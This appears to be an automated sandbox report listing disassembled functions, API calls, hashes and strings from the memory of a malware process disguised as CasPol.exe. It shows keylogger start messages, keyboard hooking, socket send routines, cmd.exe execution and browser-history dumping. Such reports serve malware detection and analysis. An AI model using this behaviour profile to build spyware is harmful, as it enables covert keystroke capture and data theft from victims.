                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                    • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                    • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                    • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                    APIs
                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                    • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                    • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                      • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                      • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                    • String ID: (FG
                                                                                                                    • API String ID: 3142014140-2273637114
                                                                                                                    • Opcode ID: 9a1b59bbed3356950195ba07b1a03bd03f5c7be3db3bd7b9db76135773cdd398
                                                                                                                    • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                                                                                                                    • Opcode Fuzzy Hash: 9a1b59bbed3356950195ba07b1a03bd03f5c7be3db3bd7b9db76135773cdd398
                                                                                                                    • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                                                                                                                    APIs
                                                                                                                    • _strpbrk.LIBCMT ref: 0044D4B8
                                                                                                                    • _free.LIBCMT ref: 0044D5D5
                                                                                                                      • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,?,?,?,00414BBD,?,00000000,00000000,?,0043A856,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
                                                                                                                      • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A888
                                                                                                                      • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000), ref: 0043A88F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                    • String ID: *?$.
                                                                                                                    • API String ID: 2812119850-3972193922
                                                                                                                    • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                                    • Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
                                                                                                                    • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                                    • Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54
                                                                                                                    APIs
                                                                                                                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                      • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                      • Part of subcall function 0040428C: connect.WS2_32(?,00D8BF50,00000010), ref: 004042A5
                                                                                                                      • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                    • String ID: XCG$`AG$>G
                                                                                                                    • API String ID: 2334542088-2372832151
                                                                                                                    • Opcode ID: d5fde74a72ab23943b571da8d82e14ca3d032a186f9542a9d8838a507179a395
                                                                                                                    • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                                                                                                    • Opcode Fuzzy Hash: d5fde74a72ab23943b571da8d82e14ca3d032a186f9542a9d8838a507179a395
                                                                                                                    • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442724
                                                                                                                    • _free.LIBCMT ref: 004427EF
                                                                                                                    • _free.LIBCMT ref: 004427F9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                    • API String ID: 2506810119-3657627342
                                                                                                                    • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                                    • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                                                                                                                    • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                                    • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 10004C1D
                                                                                                                    • _free.LIBCMT ref: 10004CE8
                                                                                                                    • _free.LIBCMT ref: 10004CF2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                    • API String ID: 2506810119-3657627342
                                                                                                                    • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                    • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                    • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                    • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                      • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                    • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                    • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                    • API String ID: 368326130-2663660666
                                                                                                                    • Opcode ID: fbe8e0342797dfc48e0b09f38c49579a36867b600651027c00f538e7970574aa
                                                                                                                    • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                                                                                                                    • Opcode Fuzzy Hash: fbe8e0342797dfc48e0b09f38c49579a36867b600651027c00f538e7970574aa
                                                                                                                    • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                                                      • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                      • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateThread$LocalTimewsprintf
                                                                                                                    • String ID: Offline Keylogger Started
                                                                                                                    • API String ID: 465354869-4114347211
                                                                                                                    • Opcode ID: 570e04be0e4ffa855f27f1ca213c906f0df4e766948eb3acc4b01943e62d06e0
                                                                                                                    • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                                                                                                                    • Opcode Fuzzy Hash: 570e04be0e4ffa855f27f1ca213c906f0df4e766948eb3acc4b01943e62d06e0
                                                                                                                    • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                      • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                    • String ID: Online Keylogger Started
                                                                                                                    • API String ID: 112202259-1258561607
                                                                                                                    • Opcode ID: 564b200d65e3c73e3a7e2304ccbb93078783a11880c439d0c88e3e8c5b9bf4b9
                                                                                                                    • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                                                                                                    • Opcode Fuzzy Hash: 564b200d65e3c73e3a7e2304ccbb93078783a11880c439d0c88e3e8c5b9bf4b9
                                                                                                                    • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                                                                                                                    • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                                                                                                    • __dosmaperr.LIBCMT ref: 0044AB0E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                    • String ID: `@
                                                                                                                    • API String ID: 2583163307-951712118
                                                                                                                    • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                    • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                                                                                                    • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                    • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseEventHandleObjectSingleWait
                                                                                                                    • String ID: Connection Timeout
                                                                                                                    • API String ID: 2055531096-499159329
                                                                                                                    • Opcode ID: 96a4edac1a058f04c3ad407f14895f77ac6fb9ff937b43e6201c32ffecfaeaf2
                                                                                                                    • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                                                                                                                    • Opcode Fuzzy Hash: 96a4edac1a058f04c3ad407f14895f77ac6fb9ff937b43e6201c32ffecfaeaf2
                                                                                                                    • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                                                                                                                    APIs
                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                      • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                                                                                                                      • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                    • String ID: bad locale name
                                                                                                                    • API String ID: 3628047217-1405518554
                                                                                                                    • Opcode ID: d75f37e1b89ee78a4a0f808b0b17b1e5c3b7b9634f49529d216c4b18a17b3ee6
                                                                                                                    • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                                                                                                                    • Opcode Fuzzy Hash: d75f37e1b89ee78a4a0f808b0b17b1e5c3b7b9634f49529d216c4b18a17b3ee6
                                                                                                                    • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                                                                                                                    APIs
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecuteShell
                                                                                                                    • String ID: /C $cmd.exe$open
                                                                                                                    • API String ID: 587946157-3896048727
                                                                                                                    • Opcode ID: 48c4e9bf8b9074f27646adf5b30bc281ede9c2cdd6c59f38ee373b2102eacdae
                                                                                                                    • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                    • Opcode Fuzzy Hash: 48c4e9bf8b9074f27646adf5b30bc281ede9c2cdd6c59f38ee373b2102eacdae
                                                                                                                    • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                    APIs
                                                                                                                    • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                    • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                    • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: TerminateThread$HookUnhookWindows
                                                                                                                    • String ID: pth_unenc
                                                                                                                    • API String ID: 3123878439-4028850238
                                                                                                                    • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                    • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                    • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                    • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: GetCursorInfo$User32.dll
                                                                                                                    • API String ID: 1646373207-2714051624
                                                                                                                    • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                    • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                                                                                                                    • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                    • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetLastInputInfo$User32.dll
                                                                                                                    • API String ID: 2574300362-1519888992
                                                                                                                    • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                    • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                                                                                                                    • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                    • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1036877536-0
                                                                                                                    • Opcode ID: 04a0325834f843994ade633b459a1d3cb356a39676a395bc181b674f0ba6452b
                                                                                                                    • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                                                                                                    • Opcode Fuzzy Hash: 04a0325834f843994ade633b459a1d3cb356a39676a395bc181b674f0ba6452b
                                                                                                                    • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 269201875-0
                                                                                                                    • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                                    • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                                                                                                    • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                                    • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
